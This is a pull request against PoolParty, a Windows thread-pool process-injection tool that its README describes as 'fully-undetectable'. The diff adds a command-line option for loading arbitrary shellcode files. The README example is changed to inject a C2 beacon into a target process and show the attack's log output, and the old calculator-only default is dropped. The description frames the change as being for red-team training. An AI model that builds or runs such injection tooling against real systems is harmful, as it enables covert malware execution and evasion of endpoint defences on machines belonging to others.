### PR TITLE
Shellcode File Command Line Argument Update

### DIFF
--- a/PoolParty/PoolParty.hpp
+++ b/PoolParty/PoolParty.hpp
@@ -33,12 +33,12 @@
 namespace logging = boost::log;
 namespace keywords = boost::log::keywords;
 
-typedef struct _POOL_PARTY_CMD_ARGS
-{
-	BOOL bDebugPrivilege;
+typedef struct _POOL_PARTY_CMD_ARGS {
 	int VariantId;
 	int TargetPid;
-} POOL_PARTY_CMD_ARGS, * PPOOL_PARTY_CMD_ARGS;
+	BOOL bDebugPrivilege;
+	std::string ShellcodeFilePath;
+} POOL_PARTY_CMD_ARGS;
 
 class PoolParty
 {

--- a/PoolParty/main.cpp
+++ b/PoolParty/main.cpp
@@ -18,7 +18,7 @@ bool ReadShellcodeFromFile(const std::string& path, std::unique_ptr<unsigned cha
 		return false;
 	}
 
-	std::cout << "[+] Loaded shellcode (" << size << " bytes) from: " << path << std::endl;
+	BOOST_LOG_TRIVIAL(info) << "Loaded shellcode (" << size << " bytes) from: " << path;	
 	return true;
 }
 

--- a/README.md
+++ b/README.md
@@ -17,35 +17,29 @@ A collection of fully-undetectable process injection techniques abusing Windows 
 
 ## Usage
 ```
-PoolParty.exe -V <VARIANT ID> -P <TARGET PID>
+PoolParty.exe -V <VARIANT ID> -P <TARGET PID> -F <SHELLCODE FILE>
 ```
 
 ## Usage Examples
 
-Insert TP_TIMER work item to process ID 1234
+Insert TP_WORK work item to process ID 43988
 ```
->> PoolParty.exe -V 8 -P 1234
-
-[info]    Starting PoolParty attack against process id: 1234
-[info]    Retrieved handle to the target process: 00000000000000B8
-[info]    Hijacked worker factory handle from the target process: 0000000000000058
-[info]    Hijacked timer queue handle from the target process: 0000000000000054
-[info]    Allocated shellcode memory in the target process: 00000281DBEF0000
+> .\PoolParty\x64\Release\PoolParty.exe -V 2 -P 43988 -F .\demon.x64.bin
+[info]    Loaded shellcode (290097 bytes) from: .\demon.x64.bin
+[info]    Starting PoolParty attack against process id: 43988
+[info]    Retrieved handle to the target process: 000000000000005C
+[info]    Hijacked worker factory handle from the target process: 00000000000000BC
+[info]    Allocated shellcode memory in the target process: 000001A820F80000
 [info]    Written shellcode to the target process
 [info]    Retrieved target worker factory basic information
-[info]    Created TP_TIMER structure associated with the shellcode
-[info]    Allocated TP_TIMER memory in the target process: 00000281DBF00000
-[info]    Written the specially crafted TP_TIMER structure to the target process
-[info]    Modified the target process's TP_POOL tiemr queue list entry to point to the specially crafted TP_TIMER
-[info]    Set the timer queue to expire to trigger the dequeueing TppTimerQueueExpiration
+[info]    Read target process's TP_POOL structure into the current process
+[info]    Created TP_WORK structure associated with the shellcode
+[info]    Modified the TP_WORK structure to be associated with target process's TP_POOL
+[info]    Allocated TP_WORK memory in the target process: 000001A820FD0000
+[info]    Written the specially crafted TP_WORK structure to the target process
+[info]    Modified the target process's TP_POOL task queue list entry to point to the specially crafted TP_WORK
 [info]    PoolParty attack completed successfully
-
 ```
-
-## Default Shellcode and Customization
-The default shellcode spawns a calculator via the [WinExec API](https://learn.microsoft.com/en-us/windows/win32/api/winbase/nf-winbase-winexec). 
-
-To customize the executable to execute, change the path in the end of the `g_Shellcode` variable present in the main.cpp file.
 
 ## Author - Alon Leviev
 * LinkedIn - [Alon Leviev](https://il.linkedin.com/in/alonleviev)


### PR DESCRIPTION
I was doing a company training on process injection, and I went to use this project, but I assumed that the program had a command line argument for reading a shellcode file and the hardcoded calculator shellcode messed up the training because we wanted to demonstrate loading of a C2 beacon shellcode.

I had to refactor the code base so I could load a custom shellcode based on a file path so we could demonstrate loading a C2 beacon and custom shellcode. Consider making the shellcode file a command line argument for dynamic loading of shellcode files versus hardcoded so people can demo the project using custom shellcodes.